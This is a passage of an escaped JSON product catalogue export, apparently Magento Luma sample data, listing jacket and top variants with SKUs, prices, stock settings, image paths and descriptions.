1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1347\":{\"sku\":\"WJ12-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-XL-Blue\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1348\":{\"sku\":\"WJ12-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-XL-Purple\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1349\":{\"sku\":\"WJ12\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Jacket|Pullover|Lightweight|Soft Shell|&frac14; zip,material=Cocona&reg; performance fabric|Nylon|Cotton,pattern=Solid,climate=Spring|Warm|Windy,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ12-XS-Black,size=XS,color=Black|sku=WJ12-XS-Blue,size=XS,color=Blue|sku=WJ12-XS-Purple,size=XS,color=Purple|sku=WJ12-S-Black,size=S,color=Black|sku=WJ12-S-Blue,size=S,color=Blue|sku=WJ12-S-Purple,size=S,color=Purple|sku=WJ12-M-Black,size=M,color=Black|sku=WJ12-M-Blue,size=M,color=Blue|sku=WJ12-M-Purple,size=M,color=Purple|sku=WJ12-L-Black,size=L,color=Black|sku=WJ12-L-Blue,size=L,color=Blue|sku=WJ12-L-Purple,size=L,color=Purple|sku=WJ12-XL-Black,size=XL,color=Black|sku=WJ12-XL-Blue,size=XL,color=Blue|sku=WJ12-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Jacket|Pullover|Lightweight|Soft Shell|&frac14; zip\",\"material\":\"Cocona&reg; performance fabric|Nylon|Cotton\",\"pattern\":\"Solid\",\"climate\":\"Spring|Warm|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"1350\":{\"sku\":\"WS02-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-XS-Blue\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1351\":{\"sku\":\"WS02-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-XS-Green\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1352\":{\"sku\":\"WS02-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-XS-Red\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1353\":{\"sku\":\"WS02-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-S-Blue\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1354\":{\"sku\":\"WS02-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-S-Green\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":nu